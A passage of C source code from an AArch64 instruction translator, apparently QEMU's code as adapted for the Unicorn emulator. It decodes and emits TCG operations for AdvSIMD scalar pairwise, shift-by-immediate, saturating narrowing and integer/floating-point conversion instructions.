scalar pairwise * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----+---+-----------+------+-----------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | * +-----+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_scalar_pairwise(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); TCGv_ptr fpst; /* For some ops (the FP ones), size[1] is part of the encoding. * For ADDP strictly it is not but size[1] is always 1 for valid * encodings. 
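* E.g. FMAXNMP has base opcode 0xc with size<1> = 0, while FMINNMP
* is the same base opcode with size<1> = 1; folding size<1> into
* bit 5 below yields the distinct case labels 0xc and 0x2c.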
*/ opcode |= (extract32(size, 1, 1) << 5); switch (opcode) { case 0x3b: /* ADDP */ if (u || size != 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } fpst = NULL; break; case 0xc: /* FMAXNMP */ case 0xd: /* FADDP */ case 0xf: /* FMAXP */ case 0x2c: /* FMINNMP */ case 0x2f: /* FMINP */ /* FP op, size[0] is 32 or 64 bit */ if (!u) { if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } else { size = MO_16; } } else { size = extract32(size, 0, 1) ? MO_64 : MO_32; } if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); break; default: unallocated_encoding(s); return; } if (size == MO_64) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, 0, MO_64); read_vec_element(s, tcg_op2, rn, 1, MO_64); switch (opcode) { case 0x3b: /* ADDP */ tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); break; case 0xc: /* FMAXNMP */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, 0, size); read_vec_element_i32(s, tcg_op2, rn, 1, size); if (size == MO_16) { switch (opcode) { case 0xc: /* FMAXNMP */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0xc: /* FMAXNMP */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xd: /* FADDP */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FMAXP */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2c: /* FMINNMP */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2f: /* FMINP */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } if (fpst) { tcg_temp_free_ptr(tcg_ctx, fpst); } } /* * Common SSHR[RA]/USHR[RA] - Shift right (optional rounding/accumulate) * * This handles the common shifting code and is used by both * the vector and scalar code.
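* Rounding is done by adding 1 << (shift - 1) before shifting, so
* e.g. an unsigned rounding shift of 7 right by 2 computes
* (7 + 2) >> 2 = 2 instead of the truncating 7 >> 2 = 1.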
*/ static void handle_shri_with_rndacc(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src, TCGv_i64 tcg_rnd, bool accumulate, bool is_u, int size, int shift) { bool extended_result = false; bool round = tcg_rnd != NULL; int ext_lshift = 0; TCGv_i64 tcg_src_hi; if (round && size == 3) { extended_result = true; ext_lshift = 64 - shift; tcg_src_hi = tcg_temp_new_i64(tcg_ctx); } else if (shift == 64) { if (!accumulate && is_u) { /* result is zero */ tcg_gen_movi_i64(tcg_ctx, tcg_res, 0); return; } } /* Deal with the rounding step */ if (round) { if (extended_result) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); if (!is_u) { /* take care of sign extending tcg_res */ tcg_gen_sari_i64(tcg_ctx, tcg_src_hi, tcg_src, 63); tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, tcg_src, tcg_src_hi, tcg_rnd, tcg_zero); } else { tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi, tcg_src, tcg_zero, tcg_rnd, tcg_zero); } tcg_temp_free_i64(tcg_ctx, tcg_zero); } else { tcg_gen_add_i64(tcg_ctx, tcg_src, tcg_src, tcg_rnd); } } /* Now do the shift right */ if (round && extended_result) { /* extended case, >64 bit precision required */ if (ext_lshift == 0) { /* special case, only high bits matter */ tcg_gen_mov_i64(tcg_ctx, tcg_src, tcg_src_hi); } else { tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); tcg_gen_shli_i64(tcg_ctx, tcg_src_hi, tcg_src_hi, ext_lshift); tcg_gen_or_i64(tcg_ctx, tcg_src, tcg_src, tcg_src_hi); } } else { if (is_u) { if (shift == 64) { /* essentially shifting in 64 zeros */ tcg_gen_movi_i64(tcg_ctx, tcg_src, 0); } else { tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift); } } else { if (shift == 64) { /* effectively extending the sign-bit */ tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, 63); } else { tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, shift); } } } if (accumulate) { tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_src); } else { tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_src); } if (extended_result) { tcg_temp_free_i64(tcg_ctx, tcg_src_hi); } } /* SSHR[RA]/USHR[RA] - Scalar shift right (optional rounding/accumulate) */ static void handle_scalar_simd_shri(DisasContext *s, bool is_u, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int size = 3; int immhb = immh << 3 | immb; int shift = 2 * (8 << size) - immhb; bool accumulate = false; bool round = false; bool insert = false; TCGv_i64 tcg_rn; TCGv_i64 tcg_rd; TCGv_i64 tcg_round; if (!extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x02: /* SSRA / USRA (accumulate) */ accumulate = true; break; case 0x04: /* SRSHR / URSHR (rounding) */ round = true; break; case 0x06: /* SRSRA / URSRA (accum + rounding) */ accumulate = round = true; break; case 0x08: /* SRI */ insert = true; break; } if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } tcg_rn = read_fp_dreg(s, rn); tcg_rd = (accumulate || insert) ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); if (insert) { /* shift count same as element size is valid but does nothing; * special case to avoid potential shift by 64. 
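* (For SRI the inserted field is esize - shift bits wide, so a shift
* equal to the element size leaves the destination intact; the guard
* below also avoids an undefined shift by 64.)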
*/ int esize = 8 << size; if (shift != esize) { tcg_gen_shri_i64(tcg_ctx, tcg_rn, tcg_rn, shift); tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, 0, esize - shift); } } else { handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, accumulate, is_u, size, shift); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } } /* SHL/SLI - Scalar shift left */ static void handle_scalar_simd_shli(DisasContext *s, bool insert, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = 32 - clz32(immh) - 1; int immhb = immh << 3 | immb; int shift = immhb - (8 << size); TCGv_i64 tcg_rn = new_tmp_a64(s); TCGv_i64 tcg_rd = new_tmp_a64(s); if (!extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rn = read_fp_dreg(s, rn); tcg_rd = insert ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx); if (insert) { tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, shift, 64 - shift); } else { tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rn, shift); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); } /* SQSHRN/SQSHRUN - Saturating (signed/unsigned) shift right with * (signed/unsigned) narrowing */ static void handle_vec_simd_sqshrn(DisasContext *s, bool is_scalar, bool is_q, bool is_u_shift, bool is_u_narrow, int immh, int immb, int opcode, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int esize = 8 << size; int shift = (2 * esize) - immhb; int elements = is_scalar ? 1 : (64 / esize); bool round = extract32(opcode, 0, 1); MemOp ldop = (size + 1) | (is_u_shift ? 0 : MO_SIGN); TCGv_i64 tcg_rn, tcg_rd, tcg_round; TCGv_i32 tcg_rd_narrowed; TCGv_i64 tcg_final; static NeonGenNarrowEnvFn * const signed_narrow_fns[4][2] = { { gen_helper_neon_narrow_sat_s8, gen_helper_neon_unarrow_sat8 }, { gen_helper_neon_narrow_sat_s16, gen_helper_neon_unarrow_sat16 }, { gen_helper_neon_narrow_sat_s32, gen_helper_neon_unarrow_sat32 }, { NULL, NULL }, }; static NeonGenNarrowEnvFn * const unsigned_narrow_fns[4] = { gen_helper_neon_narrow_sat_u8, gen_helper_neon_narrow_sat_u16, gen_helper_neon_narrow_sat_u32, NULL }; NeonGenNarrowEnvFn *narrowfn; int i; assert(size < 4); if (extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (is_u_shift) { narrowfn = unsigned_narrow_fns[size]; } else { narrowfn = signed_narrow_fns[size][is_u_narrow ? 
1 : 0]; } tcg_rn = tcg_temp_new_i64(tcg_ctx); tcg_rd = tcg_temp_new_i64(tcg_ctx); tcg_rd_narrowed = tcg_temp_new_i32(tcg_ctx); tcg_final = tcg_const_i64(tcg_ctx, 0); if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, ldop); handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, false, is_u_shift, size+1, shift); narrowfn(tcg_ctx, tcg_rd_narrowed, tcg_ctx->cpu_env, tcg_rd); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd_narrowed); tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); } if (!is_q) { write_vec_element(s, tcg_final, rd, 0, MO_64); } else { write_vec_element(s, tcg_final, rd, 1, MO_64); } if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd_narrowed); tcg_temp_free_i64(tcg_ctx, tcg_final); clear_vec_high(s, is_q, rd); } /* SQSHLU, UQSHL, SQSHL: saturating left shifts */ static void handle_simd_qshl(DisasContext *s, bool scalar, bool is_q, bool src_unsigned, bool dst_unsigned, int immh, int immb, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int shift = immhb - (8 << size); int pass; assert(immh != 0); assert(!(scalar && is_q)); if (!scalar) { if (!is_q && extract32(immh, 3, 1)) { unallocated_encoding(s); return; } /* Since we use the variable-shift helpers we must * replicate the shift count into each element of * the tcg_shift value. */ switch (size) { case 0: shift |= shift << 8; /* fall through */ case 1: shift |= shift << 16; break; case 2: case 3: break; default: g_assert_not_reached(); } } if (!fp_access_check(s)) { return; } if (size == 3) { TCGv_i64 tcg_shift = tcg_const_i64(tcg_ctx, shift); static NeonGenTwo64OpEnvFn * const fns[2][2] = { { gen_helper_neon_qshl_s64, gen_helper_neon_qshlu_s64 }, { NULL, gen_helper_neon_qshl_u64 }, }; NeonGenTwo64OpEnvFn *genfn = fns[src_unsigned][dst_unsigned]; int maxpass = is_q ? 2 : 1; for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); write_vec_element(s, tcg_op, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); } tcg_temp_free_i64(tcg_ctx, tcg_shift); clear_vec_high(s, is_q, rd); } else { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, shift); static NeonGenTwoOpEnvFn * const fns[2][2][3] = { { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_s16, gen_helper_neon_qshl_s32 }, { gen_helper_neon_qshlu_s8, gen_helper_neon_qshlu_s16, gen_helper_neon_qshlu_s32 } }, { { NULL, NULL, NULL }, { gen_helper_neon_qshl_u8, gen_helper_neon_qshl_u16, gen_helper_neon_qshl_u32 } } }; NeonGenTwoOpEnvFn *genfn = fns[src_unsigned][dst_unsigned][size]; MemOp memop = scalar ? size : MO_32; int maxpass = scalar ? 1 : is_q ? 
4 : 2; for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, memop); genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); if (scalar) { switch (size) { case 0: tcg_gen_ext8u_i32(tcg_ctx, tcg_op, tcg_op); break; case 1: tcg_gen_ext16u_i32(tcg_ctx, tcg_op, tcg_op); break; case 2: break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_op); } else { write_vec_element_i32(s, tcg_op, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_op); } tcg_temp_free_i32(tcg_ctx, tcg_shift); if (!scalar) { clear_vec_high(s, is_q, rd); } } } /* Common vector code for handling integer to FP conversion */ static void handle_simd_intfp_conv(DisasContext *s, int rd, int rn, int elements, int is_signed, int fracbits, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); TCGv_i32 tcg_shift = NULL; MemOp mop = size | (is_signed ? MO_SIGN : 0); int pass; if (fracbits || size == MO_64) { tcg_shift = tcg_const_i32(tcg_ctx, fracbits); } if (size == MO_64) { TCGv_i64 tcg_int64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < elements; pass++) { read_vec_element(s, tcg_int64, rn, pass, mop); if (is_signed) { gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int64, tcg_shift, tcg_fpst); } else { gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int64, tcg_shift, tcg_fpst); } if (elements == 1) { write_fp_dreg(s, rd, tcg_double); } else { write_vec_element(s, tcg_double, rd, pass, MO_64); } } tcg_temp_free_i64(tcg_ctx, tcg_int64); tcg_temp_free_i64(tcg_ctx, tcg_double); } else { TCGv_i32 tcg_int32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_float = tcg_temp_new_i32(tcg_ctx); for (pass = 0; pass < elements; pass++) { read_vec_element_i32(s, tcg_int32, rn, pass, mop); switch (size) { case MO_32: if (fracbits) { if (is_signed) { gen_helper_vfp_sltos(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } else { gen_helper_vfp_ultos(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } } else { if (is_signed) { gen_helper_vfp_sitos(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } else { gen_helper_vfp_uitos(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } } break; case MO_16: if (fracbits) { if (is_signed) { gen_helper_vfp_sltoh(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } else { gen_helper_vfp_ultoh(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } } else { if (is_signed) { gen_helper_vfp_sitoh(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } else { gen_helper_vfp_uitoh(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } } break; default: g_assert_not_reached(); } if (elements == 1) { write_fp_sreg(s, rd, tcg_float); } else { write_vec_element_i32(s, tcg_float, rd, pass, size); } } tcg_temp_free_i32(tcg_ctx, tcg_int32); tcg_temp_free_i32(tcg_ctx, tcg_float); } tcg_temp_free_ptr(tcg_ctx, tcg_fpst); if (tcg_shift) { tcg_temp_free_i32(tcg_ctx, tcg_shift); } clear_vec_high(s, elements << size == 16, rd); } /* UCVTF/SCVTF - Integer to FP conversion */ static void handle_simd_shift_intfp_conv(DisasContext *s, bool is_scalar, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { int size, elements, fracbits; int immhb = immh << 3 | immb; if (immh & 8) { size = MO_64; if (!is_scalar && !is_q) { unallocated_encoding(s); return; } } else if (immh & 4) { size = MO_32; } else if (immh & 2) { size = MO_16; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } } else { /* immh == 0 would be a failure of the decode logic */ 
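/* immh == 1 would select 8-bit elements, for which no FP type
 * exists, so the encoding is unallocated rather than a decoder
 * error. */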
g_assert(immh == 1); unallocated_encoding(s); return; } if (is_scalar) { elements = 1; } else { elements = (8 << is_q) >> size; } fracbits = (16 << size) - immhb; if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, !is_u, fracbits, size); } /* FCVTZS, FCVTZU - FP to fixed-point conversion */ static void handle_simd_shift_fpint_conv(DisasContext *s, bool is_scalar, bool is_q, bool is_u, int immh, int immb, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int pass, size, fracbits; TCGv_ptr tcg_fpstatus; TCGv_i32 tcg_rmode, tcg_shift; if (immh & 0x8) { size = MO_64; if (!is_scalar && !is_q) { unallocated_encoding(s); return; } } else if (immh & 0x4) { size = MO_32; } else if (immh & 0x2) { size = MO_16; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } } else { /* Should have split out AdvSIMD modified immediate earlier. */ assert(immh == 1); unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } assert(!(is_scalar && is_q)); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(FPROUNDING_ZERO)); tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, size == MO_16); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); fracbits = (16 << size) - immhb; tcg_shift = tcg_const_i32(tcg_ctx, fracbits); if (size == MO_64) { int maxpass = is_scalar ? 1 : 2; for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); if (is_u) { gen_helper_vfp_touqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_tosqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); } write_vec_element(s, tcg_op, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); } clear_vec_high(s, is_q, rd); } else { void (*fn)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); int maxpass = is_scalar ?
1 : ((8 << is_q) >> size); switch (size) { case MO_16: if (is_u) { fn = gen_helper_vfp_touhh; } else { fn = gen_helper_vfp_toshh; } break; case MO_32: if (is_u) { fn = gen_helper_vfp_touls; } else { fn = gen_helper_vfp_tosls; } break; default: g_assert_not_reached(); } for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, size); fn(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); if (is_scalar) { write_fp_sreg(s, rd, tcg_op); } else { write_vec_element_i32(s, tcg_op, rd, pass, size); } tcg_temp_free_i32(tcg_ctx, tcg_op); } if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } /* AdvSIMD scalar shift by immediate * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 * +-----+---+-------------+------+------+--------+---+------+------+ * | 0 1 | U | 1 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | * +-----+---+-------------+------+------+--------+---+------+------+ * * This is the scalar version, so it works on fixed-size registers. */ static void disas_simd_scalar_shift_imm(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int immb = extract32(insn, 16, 3); int immh = extract32(insn, 19, 4); bool is_u = extract32(insn, 29, 1); if (immh == 0) { unallocated_encoding(s); return; } switch (opcode) { case 0x08: /* SRI */ if (!is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x00: /* SSHR / USHR */ case 0x02: /* SSRA / USRA */ case 0x04: /* SRSHR / URSHR */ case 0x06: /* SRSRA / URSRA */ handle_scalar_simd_shri(s, is_u, immh, immb, opcode, rn, rd); break; case 0x0a: /* SHL / SLI */ handle_scalar_simd_shli(s, is_u, immh, immb, opcode, rn, rd); break; case 0x1c: /* SCVTF, UCVTF */ handle_simd_shift_intfp_conv(s, true, false, is_u, immh, immb, opcode, rn, rd); break; case 0x10: /* SQSHRUN, SQSHRUN2 */ case 0x11: /* SQRSHRUN, SQRSHRUN2 */ if (!is_u) { unallocated_encoding(s); return; } handle_vec_simd_sqshrn(s, true, false, false, true, immh, immb, opcode, rn, rd); break; case 0x12: /* SQSHRN, SQSHRN2, UQSHRN */ case 0x13: /* SQRSHRN, SQRSHRN2, UQRSHRN, UQRSHRN2 */ handle_vec_simd_sqshrn(s, true, false, is_u, is_u, immh, immb, opcode, rn, rd); break; case 0xc: /* SQSHLU */ if (!is_u) { unallocated_encoding(s); return; } handle_simd_qshl(s, true, false, false, true, immh, immb, rn, rd); break; case 0xe: /* SQSHL, UQSHL */ handle_simd_qshl(s, true, false, is_u, is_u, immh, immb, rn, rd); break; case 0x1f: /* FCVTZS, FCVTZU */ handle_simd_shift_fpint_conv(s, true, false, is_u, immh, immb, rn, rd); break; default: unallocated_encoding(s); break; } } /* AdvSIMD scalar three different * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | * +-----+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_simd_scalar_three_reg_diff(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (is_u) { unallocated_encoding(s); return; } switch (opcode) { case 0x9: /* SQDMLAL,
SQDMLAL2 */ case 0xb: /* SQDMLSL, SQDMLSL2 */ case 0xd: /* SQDMULL, SQDMULL2 */ if (size == 0 || size == 3) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (size == 2) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, 0, MO_32 | MO_SIGN); read_vec_element(s, tcg_op2, rm, 0, MO_32 | MO_SIGN); tcg_gen_mul_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); switch (opcode) { case 0xd: /* SQDMULL, SQDMULL2 */ break; case 0xb: /* SQDMLSL, SQDMLSL2 */ tcg_gen_neg_i64(tcg_ctx, tcg_res, tcg_res); /* fall through */ case 0x9: /* SQDMLAL, SQDMLAL2 */ read_vec_element(s, tcg_op1, rd, 0, MO_64); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_op1); break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op1 = read_fp_hreg(s, rn); TCGv_i32 tcg_op2 = read_fp_hreg(s, rm); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); gen_helper_neon_mull_s16(tcg_ctx, tcg_res, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); switch (opcode) { case 0xd: /* SQDMULL, SQDMULL2 */ break; case 0xb: /* SQDMLSL, SQDMLSL2 */ gen_helper_neon_negl_u32(tcg_ctx, tcg_res, tcg_res); /* fall through */ case 0x9: /* SQDMLAL, SQDMLAL2 */ { TCGv_i64 tcg_op3 = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op3, rd, 0, MO_32); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_op3); break; } default: g_assert_not_reached(); } tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } } static void handle_3same_64(DisasContext *s, int opcode, bool u, TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i64 tcg_rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 64x64->64 opcodes which are shared between the scalar * and vector 3-same groups. We cover every opcode where size == 3 * is valid in either the three-reg-same (integer, not pairwise) * or scalar-three-reg-same groups. */ TCGCond cond; switch (opcode) { case 0x1: /* SQADD */ if (u) { gen_helper_neon_qadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x5: /* SQSUB */ if (u) { gen_helper_neon_qsub_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qsub_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x6: /* CMGT, CMHI */ /* 64 bit integer comparison, result = test ? (2^64 - 1) : 0. * We implement this using setcond (test) and then negating. */ cond = u ? TCG_COND_GTU : TCG_COND_GT; do_cmop: tcg_gen_setcond_i64(tcg_ctx, cond, tcg_rd, tcg_rn, tcg_rm); tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); break; case 0x7: /* CMGE, CMHS */ cond = u ? 
